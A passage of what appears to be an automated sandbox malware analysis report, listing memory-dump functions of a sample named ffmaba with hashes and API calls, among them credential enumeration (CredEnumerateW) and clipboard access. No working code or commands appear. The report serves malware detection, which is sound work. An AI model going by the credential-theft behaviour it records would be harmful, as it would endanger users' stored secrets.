                                                                            • Opcode ID: 4bd1b0cba33c9dbb0309ffdfe4830eddd0855fc3615eb00245c37413f1869536
                                                                            • Instruction ID: c98c7af0486376f58d7f9f97f032992935351d5916ce2eadb953adf70c7db6ad
                                                                            • Opcode Fuzzy Hash: 4bd1b0cba33c9dbb0309ffdfe4830eddd0855fc3615eb00245c37413f1869536
                                                                            • Instruction Fuzzy Hash: 5FE1AF74E01219CFDB64DFA9C984B9DFBB2BF89304F1481AAD409AB365DB349981CF50
                                                                            Function 06290158 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4564711094.0000000006290000.00000040.00000800.00020000.00000000.sdmp, Offset: 06290000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_6290000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $cq
                                                                            • API String ID: 0-2110363268
                                                                            • Opcode ID: 0e3fab6f73446a427e575ba398b9c019c8f7529a752c16848de2450c68a8c0be
                                                                            • Instruction ID: bce990f2ad9d17357712ce48024e080a923ab4fea26d425a1e1b23bf1c966c2d
                                                                            • Opcode Fuzzy Hash: 0e3fab6f73446a427e575ba398b9c019c8f7529a752c16848de2450c68a8c0be
                                                                            • Instruction Fuzzy Hash: 8451F070E11209DFDF58DFA9D984A9EFBB2BF89300F149129E805BB2A4DB349941CF54
                                                                            Function 096784C0 Relevance: .2, Instructions: 165COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4568770378.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_9670000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4ad596d5754aab43fe4ba1b2f36abbd8c3c2ee63dc0d26769df785551bb743e7
                                                                            • Instruction ID: 522de546b4c9f17569710f2879b54731b3ea7e2c9c2aa7b4f9c7f7122b23c2b2
                                                                            • Opcode Fuzzy Hash: 4ad596d5754aab43fe4ba1b2f36abbd8c3c2ee63dc0d26769df785551bb743e7
                                                                            • Instruction Fuzzy Hash: B2719E74E01209DFDB14DFA9D584A9EFBF2BF89300F249129D419AB365DB34A982CF40
                                                                            Function 09672230 Relevance: .1, Instructions: 131COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4568770378.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_9670000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2fd5392be0226d3e45170ab002b9465c41b3999750de64e3e66d8cd7b0e65923
                                                                            • Instruction ID: 61d003bcda500711afcb03af3b812746b5d421b14158033e5d4dc9d16432135f
                                                                            • Opcode Fuzzy Hash: 2fd5392be0226d3e45170ab002b9465c41b3999750de64e3e66d8cd7b0e65923
                                                                            • Instruction Fuzzy Hash: CF51DD74D01219CBCB18CFA5CA54AEEFBB2BF89300F20906AD419BB264DB745A45CF50
                                                                            Function 0967222E Relevance: .1, Instructions: 98COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4568770378.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_9670000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0f154b3cd532519e44ca7ed7ff9644f1327518831232ea09a115ebe43699781e
                                                                            • Instruction ID: e08be6d0d70218a62fc99598a35b7a98eacc06d82f5dcca7a3f983d7bffec755
                                                                            • Opcode Fuzzy Hash: 0f154b3cd532519e44ca7ed7ff9644f1327518831232ea09a115ebe43699781e
                                                                            • Instruction Fuzzy Hash: 4641EF70D013188BDB18CFA5C6587EDFBB2AF89304F209029D419BB254DB754A45CB54
                                                                            Function 052CB499 Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 052CB6FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4558108362.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_52c0000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: d49937d02139d5953cdcd2ce0efdd72082e657405770b66621af93cd328a5365
                                                                            • Instruction ID: 2fa7c2887bddc9eca2036971c733d72a17978f8c0c0da58f12c2e55342eea897
                                                                            • Opcode Fuzzy Hash: d49937d02139d5953cdcd2ce0efdd72082e657405770b66621af93cd328a5365
                                                                            • Instruction Fuzzy Hash: 748155B1A10B068FD724DF2AD44675ABBF6FF48300F008A6ED48AD7A41D735E949CB90
                                                                            Function 052C58EC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 052C59A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4558108362.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_52c0000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 722dcdb591f0a07ba82d1dad21c0d76e38dc92ead55dd662175bc73e62cdecc8
                                                                            • Instruction ID: 4ba5c51b3edc41115b10e2eafaa51520c865282d264065bf8f7f9446e885528b
                                                                            • Opcode Fuzzy Hash: 722dcdb591f0a07ba82d1dad21c0d76e38dc92ead55dd662175bc73e62cdecc8
                                                                            • Instruction Fuzzy Hash: CD41E2B0D10719CBDB24CFAAC984B8EBBF2BF49304F20816AD409AB251DB756949CF50
                                                                            Function 052C44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 052C59A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4558108362.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_52c0000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: d5ba6222fde677474be25cd7fc241051968679acd742900d009dd08bd981d249
                                                                            • Instruction ID: e51663325bc76baa160c347d4d3ffea47764a57b0da27241cf4f857af23e2cec
                                                                            • Opcode Fuzzy Hash: d5ba6222fde677474be25cd7fc241051968679acd742900d009dd08bd981d249
                                                                            • Instruction Fuzzy Hash: 2241F3B0D10719CBDB24CFAAC884B8DBBF6BF48304F20816AD409AB251DB756949CF90
                                                                            Function 0629372E Relevance: 1.6, APIs: 1, Instructions: 75comclipboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4564711094.0000000006290000.00000040.00000800.00020000.00000000.sdmp, Offset: 06290000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_6290000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard
                                                                            • String ID:
                                                                            • API String ID: 220874293-0
                                                                            • Opcode ID: 046f5dbdff7e1e8616206e3eed001a296bd98b5214492dee760c1b82ab1f5a5f
                                                                            • Instruction ID: d9d4004018b42fb78b2b763830d083b7ab00084f7b52172b9411f258a4195e34
                                                                            • Opcode Fuzzy Hash: 046f5dbdff7e1e8616206e3eed001a296bd98b5214492dee760c1b82ab1f5a5f
                                                                            • Instruction Fuzzy Hash: 473110B0D11249DFDB24CFA9C994BCEBBF2AF49304F248059E444AB290D7B4A945CB61
                                                                            Function 06293738 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4564711094.0000000006290000.00000040.00000800.00020000.00000000.sdmp, Offset: 06290000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_6290000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard
                                                                            • String ID:
                                                                            • API String ID: 220874293-0
                                                                            • Opcode ID: 1007ad4094a2b9e9a16d52c41c7669a5aaacbc9b77802b519487417666e50c01
                                                                            • Instruction ID: 79629944c9e71904d25a909e529e013f3c125cb8a0db02c94578a663a25fca91
                                                                            • Opcode Fuzzy Hash: 1007ad4094a2b9e9a16d52c41c7669a5aaacbc9b77802b519487417666e50c01
                                                                            • Instruction Fuzzy Hash: 5031F1B0D11249DFDB14CF99C984BCDBBF5BF88314F248059E504AB390D7B4A945CB65
                                                                            Function 09678250 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CredEnumerateW.SECHOST(00000000,?,?,?), ref: 096782E3
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4568770378.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_9670000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: CredEnumerate
                                                                            • String ID:
                                                                            • API String ID: 3404281133-0
                                                                            • Opcode ID: 8e3ede9e9533f46cd2602c9d82d5e333de5aaf40eea01946200781f8cc2feb34
                                                                            • Instruction ID: e10e0ab0791cc8f8a16f4e67c280bf83c59b504370fc5e482ca7e745fb166bb6
                                                                            • Opcode Fuzzy Hash: 8e3ede9e9533f46cd2602c9d82d5e333de5aaf40eea01946200781f8cc2feb34
                                                                            • Instruction Fuzzy Hash: 202104B5C0161AEFCB10CF99D584ADEFBB4FF48310F10812AE858A7341D774AA54DBA4
                                                                            Function 09678258 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CredEnumerateW.SECHOST(00000000,?,?,?), ref: 096782E3
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4568770378.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_9670000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: CredEnumerate
                                                                            • String ID:
                                                                            • API String ID: 3404281133-0
                                                                            • Opcode ID: 1d7e875d918b0ea3e3ae78e21f67b65669e7ab9cf87ec907d0f1f142bc94496a
                                                                            • Instruction ID: a7cc344f48e77ec265aab938a9434e01d45d37e22a65cdf5494aae3a68f8fefd
                                                                            • Opcode Fuzzy Hash: 1d7e875d918b0ea3e3ae78e21f67b65669e7ab9cf87ec907d0f1f142bc94496a
                                                                            • Instruction Fuzzy Hash: 7721C3B5D01619AFCB10CF9AD584ADEFBB4FB08320F10812AE918A7341D775AA44DBA5
                                                                            Function 052CD2D0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,052CD94E,?,?,?,?,?), ref: 052CDA0F
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4558108362.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_52c0000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 3900fce1377dda313b5d91bba3fe3620465c9184da81708c1afbf0771fb243d5
                                                                            • Instruction ID: d67c72565f4056df74e175edffb597511c10230dcf8403d35397865fa877d781
                                                                            • Opcode Fuzzy Hash: 3900fce1377dda313b5d91bba3fe3620465c9184da81708c1afbf0771fb243d5
                                                                            • Instruction Fuzzy Hash: 3321F4B5910249DFDB10CF9AD884AEEBFF5EB48310F14845AE918A3311D374A940CFA0
                                                                            Function 052CAE98 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,052CB779,00000800,00000000,00000000), ref: 052CB98A
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4558108362.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_52c0000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: b20687f6b185ed36fb51bb127f2b0493804364d831508e21f41e988d6e5fa37d
                                                                            • Instruction ID: e67f5a8033212b681d1d4e41a3675457326ae6d78514a2fe7bb3b46946ede871
                                                                            • Opcode Fuzzy Hash: b20687f6b185ed36fb51bb127f2b0493804364d831508e21f41e988d6e5fa37d
                                                                            • Instruction Fuzzy Hash: 3C2145B28043498FCB10CFAAC885A9ABFF4EF49210F44809ED559AB212C375A505CFA5
                                                                            Function 052CAEB0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,052CB779,00000800,00000000,00000000), ref: 052CB98A
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4558108362.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_52c0000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: f9a89aaff692be6f8ee6be3614c8a087d622a2f3a7849113e66ab8d7b3a4088f
                                                                            • Instruction ID: 44ebb3e2a8c5cd6b401c918a14909e6aea2b647c670abcb6c01430a8e406b068
                                                                            • Opcode Fuzzy Hash: f9a89aaff692be6f8ee6be3614c8a087d622a2f3a7849113e66ab8d7b3a4088f
                                                                            • Instruction Fuzzy Hash: 8A1103B68142498FCB20CF9AC484A9EFBF9EF48310F50856ED919A7201C375A544CFA5
                                                                            Function 052CB919 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,052CB779,00000800,00000000,00000000), ref: 052CB98A
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4558108362.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_52c0000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: f871208c0df76150e5d53699657efe691e3a153d4bf3728e34b3a38ef7f87109
                                                                            • Instruction ID: 6359118a97c8dca5cc41305e349ea744be6c3acd286f878de0efb4897590fe59
                                                                            • Opcode Fuzzy Hash: f871208c0df76150e5d53699657efe691e3a153d4bf3728e34b3a38ef7f87109
                                                                            • Instruction Fuzzy Hash: 611103B6800209CFCB10CF9AD885B9EFBF4EB48310F54852ED519A7200C379A544CFA5
                                                                            Function 052CB698 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 052CB6FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4558108362.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_52c0000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 01a418eccbdcc878356f5ff77fe95ed8d4cffaab422b8ef397a8a3f67f2d851c
                                                                            • Instruction ID: d30c92b7fd79f5aa56a56ef76042e2ad0e25934572ca602e19aa6e7ac14f9bd6
                                                                            • Opcode Fuzzy Hash: 01a418eccbdcc878356f5ff77fe95ed8d4cffaab422b8ef397a8a3f67f2d851c
                                                                            • Instruction Fuzzy Hash: 981102B6C00249CFCB10CF9AD845A9EFBF9EF88320F10855AD819A7201C379A545CFA1
                                                                            Function 0130D3D8 Relevance: .1, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4508698795.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_130d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5d98c1ee9f638f10598a52d48a547d3dbaf79cd645f28ba189ff57d3cff18d34
                                                                            • Instruction ID: 25ed0160e7f70fc75bc6cb20203c87c9ee6239b3f2bcadd4b8e357d2a2ccd0b6
                                                                            • Opcode Fuzzy Hash: 5d98c1ee9f638f10598a52d48a547d3dbaf79cd645f28ba189ff57d3cff18d34
                                                                            • Instruction Fuzzy Hash: E4214871104204DFDB02DF88D9C0B66BFE5FB88328F20C56DE9091B286C736E406C6A2
                                                                            Function 0130D4C4 Relevance: .1, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4508698795.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_130d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ddaf26e0fba153e66f5b69ac883f452f2e707fb14890e5c2e5f9471747ce8df2
                                                                            • Instruction ID: d1f2c97bfb1e563edc8fe7b7b2721dc890c0cf1794b91ea47fb1eccf0d99ee69
                                                                            • Opcode Fuzzy Hash: ddaf26e0fba153e66f5b69ac883f452f2e707fb14890e5c2e5f9471747ce8df2
                                                                            • Instruction Fuzzy Hash: C1213371504204DFCB02DF98D9D0B26BFE5FB8832CF20C569EC091B28AC336D406CAA1
                                                                            Function 0142D1D4 Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4509140545.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_142d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f3a3620fefbad154b52ae507532a851d9538b4414aa574f64c9bf1af376feadc
                                                                            • Instruction ID: 6d46a317a790e479048a79389128bf0b167785241821f697a4a7f1a38ea9418c
                                                                            • Opcode Fuzzy Hash: f3a3620fefbad154b52ae507532a851d9538b4414aa574f64c9bf1af376feadc
                                                                            • Instruction Fuzzy Hash: E3213B71904200DFDB06DF98D9C0B26BB65FB85324F64C96ED9094B366C736D486CB71
                                                                            Function 0142D01C Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4509140545.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_142d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eaf073d84fc05d65d2ab15987e231d1fc7d1307812fa05cd5b2c03743151732e
                                                                            • Instruction ID: a614526ec0725c71fa650d0cadaa2786e1f54724f953913979384595edceb37f
                                                                            • Opcode Fuzzy Hash: eaf073d84fc05d65d2ab15987e231d1fc7d1307812fa05cd5b2c03743151732e
                                                                            • Instruction Fuzzy Hash: 1B2125B1904240DFCB15DF58D980B16BB65EB84318F60C56ED90A4B376C33AD487CA61
                                                                            Function 0142D2FC Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4509140545.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_142d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a43061866971ea80011a9a50c0ad70cfa7678bf3e92f015cf4dd4c91425c3a21
                                                                            • Instruction ID: 56aae77a6d93930173819ffec65f3cccdde893023133fc75ad23057563ebc865
                                                                            • Opcode Fuzzy Hash: a43061866971ea80011a9a50c0ad70cfa7678bf3e92f015cf4dd4c91425c3a21
                                                                            • Instruction Fuzzy Hash: D0215BB1A04244DFDB01DF98D9C0B2BBB65FB88324F64C96ED8094B356C33AD486C661
                                                                            Function 0142D006 Relevance: .1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4509140545.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_142d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 14e550bb31341f50a47c085520ae47c7c00ff6afeef95767a110e4782e603818
                                                                            • Instruction ID: 04b4c52272194632dfad17d0d435a3af3203d6d844215a9764895cdda7ef709f
                                                                            • Opcode Fuzzy Hash: 14e550bb31341f50a47c085520ae47c7c00ff6afeef95767a110e4782e603818
                                                                            • Instruction Fuzzy Hash: B22180755093808FDB13CF24D594716BF71EF46214F28C5DBD8498B6A7C33A984ACB62
                                                                            Function 0130D4BF Relevance: .1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4508698795.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_130d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                            • Instruction ID: 12bef6ff531beb03aebcd627822186893265cca6ecdaa0f92cc6ea9222500da1
                                                                            • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                            • Instruction Fuzzy Hash: 8E11B176504280CFDB16CF54D5C4B16BFB1FB88328F24C6A9DD490B696C33AD45ACBA1
                                                                            Function 0130D3D3 Relevance: .1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4508698795.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_130d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                            • Instruction ID: d35fecb79482228cf5da555e3c601f1cb5b03f5e13bee081d1271ebc2056dea8
                                                                            • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                            • Instruction Fuzzy Hash: 7711E176404240CFDB02CF84D5C4B56BFB1FB84324F24C2A9D9091B257C33AE45ACBA1
                                                                            Function 0142D2F7 Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4509140545.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_142d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f0ca1e03a89bf6502059eb4096cb2751f98ce07bc6b40026132c113bb1690e3e
                                                                            • Instruction ID: bd460110061caa30776f8e8e117cdee272fe87cdbf576fbcdaba3a41c7c3d7c9
                                                                            • Opcode Fuzzy Hash: f0ca1e03a89bf6502059eb4096cb2751f98ce07bc6b40026132c113bb1690e3e
                                                                            • Instruction Fuzzy Hash: 9711BF76904280CFDB12CF14D5C4B1AFF61FB84324F24C6AAD8494B756C33AD45ACBA2
                                                                            Function 0142D1CF Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4509140545.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_142d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                                            • Instruction ID: 058754c6e111bb86080d64a2282f30c28ad0d2cda90681f234d7b2573d39a809
                                                                            • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                                            • Instruction Fuzzy Hash: B711BB75904280DFDB02CF54C5C4B16BBA1FB85324F24C6AED8494B3A6C33AD44ACB61
                                                                            Function 0130D759 Relevance: .0, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4508698795.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_130d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9583b764ce9dc2cafb58cceb6f72dad5ab91a6fb07cb9be4c60ae795165d1ea3
                                                                            • Instruction ID: 1bb1446fc6f9ef2d809bdec732ba3991e2c4ced140377acc437a235372e557eb
                                                                            • Opcode Fuzzy Hash: 9583b764ce9dc2cafb58cceb6f72dad5ab91a6fb07cb9be4c60ae795165d1ea3
                                                                            • Instruction Fuzzy Hash: BB01A7710043849AE7229EDADDC4766FFD8DF41B38F58C41AEE094A2C6C3799840CA71
                                                                            Function 0130D758 Relevance: .0, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4508698795.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_130d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fe49b0c946dd811825fac958b373ba481b832150e79e7b7a4ee5bb985bb3141a
                                                                            • Instruction ID: 7c70da026a7395899d5a10377db7bf5296c50e1d112740a3003a5f1558ffbf81
                                                                            • Opcode Fuzzy Hash: fe49b0c946dd811825fac958b373ba481b832150e79e7b7a4ee5bb985bb3141a
                                                                            • Instruction Fuzzy Hash: 5FF062724043849EE7218E5ADDC4B66FFE8EF51734F18C45AFE084A28AC3799844CAB1

                                                                            Non-executed Functions

                                                                            Function 0967AAE9 Relevance: 1.6, Strings: 1, Instructions: 362COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4568770378.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_9670000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LRcq
                                                                            • API String ID: 0-4134321033
                                                                            • Opcode ID: 298e5e52fe3e92ac38aa82fe1036250df3a81287479d22ae82d23a7380128c16
                                                                            • Instruction ID: ff42d315e39d0c4e24b0ae609faf625802eb476d34c1c3993c7f8aa9b0c7e109
                                                                            • Opcode Fuzzy Hash: 298e5e52fe3e92ac38aa82fe1036250df3a81287479d22ae82d23a7380128c16
